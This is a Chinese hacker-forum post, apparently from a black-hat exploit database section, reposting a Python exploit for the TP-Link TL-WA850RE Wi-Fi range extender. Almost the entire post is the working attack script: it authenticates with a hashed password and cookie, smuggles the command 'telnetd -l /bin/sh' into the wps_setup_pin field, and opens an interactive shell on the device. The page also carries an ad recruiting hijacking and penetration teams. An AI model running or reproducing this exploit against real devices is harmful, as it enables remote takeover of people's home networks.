跳转到帖子
诚邀seo站长,短信,劫持,渗透,代理,推广团队,博主,主播,各种资源流量大佬合作共赢【站外广告】

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

TP-Link TL-WA850RE - Remote Command Execution

HACK1949
HACK1949
黑帽漏洞数据库

精选回复

发布于 
#!/usr/bin/env python

# Exploit Title: TP-Link Technologies TL-WA850RE Wi-Fi Range Extender - Command Execution
# Date: 19/06/2018
# Exploit Author: yoresongo - Advisability S.A.S Colombia (www.advisability.co)
# Vendor Homepage: https://www.tp-link.com/
# Firmware Link: https://www.tp-link.com/en/download/TL-WA850RE.html 
# Tested on: Firmware Version TL-WA850RE_V5_180228
# Contact: yoresongo [at] advisability.co

import argparse
import requests
import hashlib
import telnetlib

parser = argparse.ArgumentParser(
    description="Exploits TP-LINK WA850RE Command injection"
)
parser.add_argument("host", help="Host to attack.", type=str)
parser.add_argument("password", help="Extender's Password", type=str)
parser.add_argument(
    "-C", "--cookie", help="Cookie id value.", type=str, default="1301a8c000c4c505"
)
args = parser.parse_args()

HOST = args.host
PASSWORD = args.password
COOKIE = args.cookie


cookies = {"gsScrollPos-8016": "0", "COOKIE": COOKIE}

headers = {
    "Origin": "http://%s/" % HOST,
    "Accept-Encoding": "gzip, deflate",
    "Accept-Language": "en-US,en;q=0.9,es;q=0.8",
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "Accept": "application/json, text/javascript, */*; q=0.01",
    "Referer": "http://%s/" % HOST,
    "X-Requested-With": "XMLHttpRequest",
    "Connection": "keep-alive",
    "DNT": "1",
}


password = hashlib.md5(PASSWORD.encode("utf-8")).hexdigest().upper()
encoded = "%s:%s" % (password, COOKIE)
encoded = hashlib.md5(encoded.encode("utf-8")).hexdigest().upper()

data = [("operation", "login"), ("encoded", encoded), ("nonce", COOKIE)]

# Payload
data_inject = [
    ("operation", "write"),
    ("option", "connect"),
    ("wps_setup_pin", "11480723;telnetd -l /bin/sh"),
]


with requests.Session() as s:
    response = s.post(
        "http://%s/data/login.json" % HOST, headers=headers, cookies=cookies, data=data
    )
    print(response.text)

    # An authorised request.
    r = s.get("http://%s" % HOST, headers=headers, cookies=cookies)
    # print (r.text)
    r = s.post(
        "http://%s/data/wps.setup.json" % HOST,
        headers=headers,
        cookies=cookies,
        data=data_inject,
    )

tn = telnetlib.Telnet(HOST)
tn.interact()

创建帐户或登录后发表意见

转到主题列表

最近浏览 0

  • 没有会员查看此页面。